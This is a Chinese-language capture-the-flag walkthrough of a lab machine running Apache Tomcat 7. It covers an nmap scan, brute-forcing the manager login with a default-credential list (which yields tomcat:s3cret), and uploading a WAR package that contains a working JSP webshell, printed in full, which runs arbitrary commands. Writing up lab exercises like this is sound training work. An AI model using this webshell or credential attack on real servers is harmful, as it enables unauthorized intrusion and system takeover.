基本信息

端口扫描

一个8080:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
$ nmap -sC -sV -Pn 10.10.10.95
Host discovery disabled (-Pn). All addresses will be marked 'up' and scan times will be slower.
Starting Nmap 7.91 ( https://nmap.org ) at 2020-11-05 14:01 CST
Nmap scan report for 10.10.10.95
Host is up (0.073s latency).
Not shown: 999 filtered ports
PORT     STATE SERVICE VERSION
8080/tcp open  http    Apache Tomcat/Coyote JSP engine 1.1
|_http-favicon: Apache Tomcat
|_http-server-header: Apache-Coyote/1.1
|_http-title: Apache Tomcat/7.0.88

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 23.58 seconds

8080

tomcat,需要密码:

tomcat爆破

字典:https://raw.githubusercontent.com/danielmiessler/SecLists/master/Passwords/Default-Credentials/tomcat-betterdefaultpasslist.txt

401基础认证,直接burp加载字典做一个base64编码就可以,注意取消自动URL编码:

得到账号密码:

1
tomcat:s3cret

webshell

就是进去直接上传war包部署,得到webshell:

直接是system权限:

shell.jsp

1
2
3
4
5
6
7
8
9
10
11
12
<%
    if("b".equals(request.getParameter("pwd"))){
        java.io.InputStream in = Runtime.getRuntime().exec(request.getParameter("i")).getInputStream();
        int a = -1;
        byte[] b = new byte[2048];
        out.print("<pre>");
        while((a=in.read(b))!=-1){
            out.println(new String(b));
        }
        out.print("</pre>");
    }
%>

reverse shell

转换成reverse shell方便交互操作:

flags

这个是两个flag在同一个文件里:

参考资料